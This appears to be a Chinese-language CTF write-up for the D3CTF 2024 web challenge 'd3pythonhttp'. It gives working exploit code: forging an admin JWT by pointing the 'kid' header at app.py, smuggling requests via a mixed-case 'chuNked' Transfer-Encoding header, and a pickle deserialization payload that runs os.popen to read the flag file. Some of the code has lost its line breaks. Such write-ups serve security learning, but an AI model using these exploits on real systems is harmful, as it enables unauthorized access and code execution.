2024 04.26 d3ctf wp - LaoGong

2024年4月28日创建
200
263
0
0
第三
web
d3pythonhttp
首先前面对token的检测有问题,用户可控制kid从而控制key,使用下面脚本可伪造一个admin jwt token。
代码块
import jwt
def get_key(kid):
key = ""dir = "/app/"try:with open(dir+kid, "r") as f:
key = f.read()except:passprint(key)return key
def verify_token(token):
header = jwt.get_unverified_header(token)
kid = header["kid"]
key = get_key(kid)try:
payload = jwt.decode(token, key, algorithms=["HS256"])return Trueexcept:return False
key = get_key("app.py")
user_info = {"username": "remilia", "isadmin": True}
token = jwt.encode(user_info, key, algorithm="HS256", headers={"kid": "app.py"})if token and verify_token(token):if jwt.decode(token, algorithms=['HS256'], options={"verify_signature": False})['isadmin']:print("success")print(token)
后续需要绕过对BackdoorPasswordOnlyForAdmin的检查,这里前端采用的写法存在问题
代码块
frontendif headers.get("Transfer-Encoding", "").lower() == "chunked":
data = "{}\r\n{}\r\n0\r\n\r\n".format(hex(len(data))[2:], data.decode())backenddef data():"""Returns the data sent with the request."""if "data" not in ctx:if ctx.env.get("HTTP_TRANSFER_ENCODING") == "chunked":
ctx.data = ctx.env["wsgi.input"].read()else:
cl = intget(ctx.env.get("CONTENT_LENGTH"), 0)
ctx.data = ctx.env["wsgi.input"].read(cl)return ctx.data
可使用大小写混合如chuNked来使前端为TE chunked模式而后端web.py走CL分支,这样控制CL就可以让后端舍弃一部分内容。
因此只需在payload的最后放上BackdoorPasswordOnlyForAdmin,并设置CL为payload的长度,就可以绕过检查。
下面是payload的构造,因为不出网,我们考虑用pickle反序列化为index类加一个POST方法来使用前端的/backend路由返回结果。
代码块
import pickle
import base64
import os
class index:def GET(self):return "welcome to the backend!"class Exploit(object):def reduce(self):return (exec,("""def new_POST(self):
return
__import__
('os').popen('cat /Secr3T_Flag').read()
index.POST = new_POST""", ))
exp = Exploit()
payload = base64.b64encode(pickle.dumps(exp)).decode()print(payload)data = base64.b64decode(payload)pickle.loads(data)